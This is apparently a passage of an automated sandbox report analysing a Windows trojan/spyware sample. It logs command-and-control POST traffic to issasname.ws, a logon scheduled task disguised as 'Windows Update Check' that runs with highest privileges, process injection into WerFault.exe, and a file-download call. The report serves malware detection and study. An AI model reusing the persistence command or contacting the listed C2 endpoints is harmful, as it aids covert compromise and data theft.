6f 6f 33 3d 36 36 46 30 33 34 43 32 37 31 46 30 33 41 43 32 37 36 46 30 33 45 43 32 37 32 46 30 35 43 43 32 31 35 46 30 34 30 43 32 31 34 46 30 32 35 43 32 31 35 46 30 34 36 43 32 31 33 46 30 32 44 43 32 34 33 46 30 31 44 43 32 34 34 46 30 31 45 43 32 34 43 46 30 30 32 43 32 26 75 75 75 75 6f 6f 34 3d 36 42 46 30 31 46 43 32 35 36 46 30 31 34 43 32 34 45 46 30 35 39 43 32 37 30 46 30 35 38 43 32 30 32 46 30 33 32 43 32 34 44 46 30 30 33 43 32 34 37 46 30 35 39 43 32 37 36 46 30 33 43 43 32 30 42 46 30 34 33 43 32 30 32 46 30 33 32 43 32 37 32 46 30 32 34 43 32 30 32 46 30 34 37 43 32 31 34 46 30 34 31 43 32 31 32 46 30 35 31 43 32 36 32 46 30 35 31 43 32 31 30 46 30 35 46 43 32 31 36 46 30 34 31 43 32 30 32 46 30 33 36 43 32 36 41 46 30 30 42 43 32 26 75 75 75 75 6f 6f 35 3d 36 46 46 30 31 38 43 32 34 31 46 30 30 33 43 3
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1052Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1048Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?id=3966837 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1066Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1052Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1018Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?id=1465544 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1042Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1062Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?page=38 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1040Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1018Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?pid=925 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1046Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?id=575573 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1078Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1078Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?id=8314615 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1040Cache-Control: no-cache
                      Source: global trafficHTTP traffic detected: POST /xyz/abc/order.php?id=5889637 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1056Cache-Control: no-cache
                      Source: BbbEtaIxAU.exe, 00000000.00000003.303714856.0000000003450000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, WerFault.exe, 00000004.00000003.316616817.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.346386030.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.340678634.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.321889200.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.392904452.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.414915674.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.387584046.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.408213818.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.436527162.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.334422756.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.365991761.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000000.304158494.0000000002860000.00000040.80000000.00040000.00000000.sdmp, WerFault.exe, 00000004.00000003.375167210.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.312736811.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.357948198.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.352061245.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.398750308.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, WerFault.exe, 00000004.00000003.381234590.00000000004E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://%s%s/image.php?id=%s
                      Source: BbbEtaIxAU.exe, 00000000.00000003.303714856.0000000003450000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.316616817.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.346386030.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.340678634.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.321889200.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.392904452.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.414915674.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.387584046.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.408213818.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.436527162.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.334422756.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.365991761.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000000.304158494.0000000002860000.00000040.80000000.00040000.00000000.sdmp, WerFault.exe, 00000004.00000003.375167210.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.312736811.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.357948198.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.352061245.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.398750308.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, WerFault.exe, 00000004.00000002.568998501.0000000002888000.00000040.80000000.00040000.00000000.sdmp, WerFault.exe, 00000004.00000003.381234590.00000000004E0000.00000004.00001000.00020000.00000000.sdmp, zkqrKAufFycYKMdseGdhuYpyTVNu.exe, 00000005.00000002.572526351.0000000003A88000.00000040.00000001.00040000.00000000.sdmpString found in binary or memory: http://%s%s/image.php?id=%sRtlQueryElevationFlagsCritical
                      Source: WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.436732002.00000000003AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://issasname.ws/xyz/abc/order.php
                      Source: WerFault.exe, 00000004.00000003.436732002.00000000003AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://issasname.ws/xyz/abc/order.php1
                      Source: WerFault.exe, 00000004.00000002.567116030.00000000003AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://issasname.ws/xyz/abc/order.php1EC24CF002C2
                      Source: WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://issasname.ws/xyz/abc/order.php9p
                      Source: WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://issasname.ws/xyz/abc/order.php?id=3966837
                      Source: WerFault.exe, 00000004.00000002.567116030.00000000003AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://issasname.ws/xyz/abc/order.php?id=575573
                      Source: WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://issasname.ws/xyz/abc/order.php?id=5889637
                      Source: WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://issasname.ws/xyz/abc/order.php?id=5889637F
                      Source: WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://issasname.ws/xyz/abc/order.php?id=5889637rivers
                      Source: WerFault.exe, 00000004.00000002.572746061.0000000004C40000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://issasname.ws/xyz/abc/order.php?id=8088252ZoFl
                      Source: WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://issasname.ws/xyz/abc/order.php?id=8314615
                      Source: WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://issasname.ws/xyz/abc/order.php?id=8314615Fv
                      Source: WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://issasname.ws/xyz/abc/order.php?id=9504479
                      Source: WerFault.exe, 00000004.00000003.398882163.00000000003AD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://issasname.ws/xyz/abc/order.php?id=9504479A
                      Source: WerFault.exe, 00000004.00000002.565612970.0000000000315000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000004.00000002.567116030.00000000003AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://issasname.ws/xyz/abc/order.php?page=7
                      Source: WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://issasname.ws/xyz/abc/order.php?page=7-
                      Source: WerFault.exe, 00000004.00000003.436732002.00000000003AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://issasname.ws/xyz/abc/order.php?page=70
                      Source: WerFault.exe, 00000004.00000002.566049326.0000000000373000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://issasname.ws/xyz/abc/order.php?page=72
                      Source: WerFault.exe, 00000004.00000003.436732002.00000000003AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://issasname.ws/xyz/abc/order.phpDESKTOP-
                      Source: WerFault.exe, 00000004.00000003.436732002.00000000003AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://issasname.ws/xyz/abc/order.phpO
                      Source: WerFault.exe, 00000004.00000002.567116030.00000000003AF000.00000004.00000020.00020000.00000000.sdmp, WerFault.exe, 00000004.00000003.436732002.00000000003AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://issasname.ws/xyz/abc/order.phpcrosoft
                      Source: WerFault.exe, 00000004.00000002.567116030.00000000003AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://issasname.ws/xyz/abc/order.phpion
                      Source: unknownHTTP traffic detected: POST /xyz/abc/order.php?id=9504479 HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: issasname.wsContent-Length: 1062Cache-Control: no-cache
                      Source: unknownDNS traffic detected: queries for: issasname.pw
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 5_2_03A79BB4 URLDownloadToFileW,5_2_03A79BB4
                      Source: yvneslhpc.exe, 00000003.00000002.306282394.0000000000ECA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
                      Source: BbbEtaIxAU.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_0286E06B4_2_0286E06B
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_028673CD4_2_028673CD
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_0286745E4_2_0286745E
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 5_2_03A6E06B5_2_03A6E06B
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 5_2_03A673CD5_2_03A673CD
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 5_2_03A6745E5_2_03A6745E
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 6_2_0333E06B6_2_0333E06B
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 6_2_033373CD6_2_033373CD
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 6_2_0333745E6_2_0333745E
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 7_2_03B6E06B7_2_03B6E06B
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 7_2_03B673CD7_2_03B673CD
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: 7_2_03B6745E7_2_03B6745E
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: String function: 02867DF1 appears 45 times
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: String function: 02871FAD appears 31 times
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: String function: 03337DF1 appears 45 times
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: String function: 03341FAD appears 31 times
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: String function: 03B71FAD appears 31 times
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: String function: 03B67DF1 appears 45 times
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: String function: 03A67DF1 appears 45 times
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeCode function: String function: 03A71FAD appears 31 times
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_02865BED NtSetInformationThread,4_2_02865BED
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_0286DB20 NtQueryInformationProcess,4_2_0286DB20
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_028660AA NtSetInformationThread,NtTerminateThread,4_2_028660AA
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_0286E06B Sleep,NtQueryInformationProcess,4_2_0286E06B
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_02864E69 NtQueryInformationProcess,4_2_02864E69
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_028644A2 NtQueryInformationProcess,4_2_028644A2
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_028644F0 NtQueryInformationProcess,NtQueryInformationProcess,4_2_028644F0
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_02864D45 NtQueryInformationProcess,4_2_02864D45
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_02880D68 NtCreateSection,NtClose,4_2_02880D68
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_02880E92 NtClose,4_2_02880E92
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_02880EDD NtClose,4_2_02880EDD
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_02880E43 NtClose,4_2_02880E43
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeSection loaded: sfc.dll
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeSection loaded: sfc.dll
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeSection loaded: sfc.dll
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeSection loaded: sfc.dll
                      Source: C:\Program Files (x86)\LywTglrcwpZLNJFyJwdQSWepxUmaLWIySbtTVQeFaJIXZEuRKbHPSaHLIN\zkqrKAufFycYKMdseGdhuYpyTVNu.exeSection loaded: sfc.dll
                      Source: BbbEtaIxAU.exeStatic PE information: Section: .rsrc ZLIB complexity 0.9925239934456929
                      Source: BbbEtaIxAU.exeReversingLabs: Detection: 89%
                      Source: BbbEtaIxAU.exeVirustotal: Detection: 92%
                      Source: BbbEtaIxAU.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: unknownProcess created: C:\Users\user\Desktop\BbbEtaIxAU.exe C:\Users\user\Desktop\BbbEtaIxAU.exe
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /CREATE /SC ONLOGON /TN "Windows Update Check - 0x03C40151" /TR "C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe" /RL HIGHEST
                      Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknownProcess created: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe
                      Source: unknownProcess created: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe "C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe"
                      Source: unknownProcess created: C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe "C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe"
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /CREATE /SC ONLOGON /TN "Windows Update Check - 0x03C40151" /TR "C:\ProgramData\Quicktime 8.5.1\yvneslhpc.exe" /RL HIGHESTJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exeJump to behavior
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_02863D40 LookupPrivilegeValueA,AdjustTokenPrivileges,FindCloseChangeNotification,4_2_02863D40
                      Source: C:\Windows\SysWOW64\WerFault.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\CryptoJump to behavior
                      Source: classification engineClassification label: mal100.phis.troj.spyw.evad.winEXE@9/1@48/2
                      Source: C:\Users\user\Desktop\BbbEtaIxAU.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_028802BF CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,4_2_028802BF
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5268:120:WilError_01
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: C:\Windows\SysWOW64\WerFault.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                      Source: BbbEtaIxAU.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_02898A21 push cs; retf 4_2_02898AA8
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_02895BFC push 55555555h; ret 4_2_02895D9C
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_02895898 push 55555555h; ret 4_2_02895D9C
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_0289581C push 55555555h; ret 4_2_02895D9C
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_02895814 push 55555555h; ret 4_2_02895D9C
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_02895824 push 55555555h; ret 4_2_02895D9C
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_02895788 push 55555555h; ret 4_2_02895D9C
                      Source: C:\Windows\SysWOW64\WerFault.exeCode function: 4_2_02898683 push es; iretd 4_2_028986F6
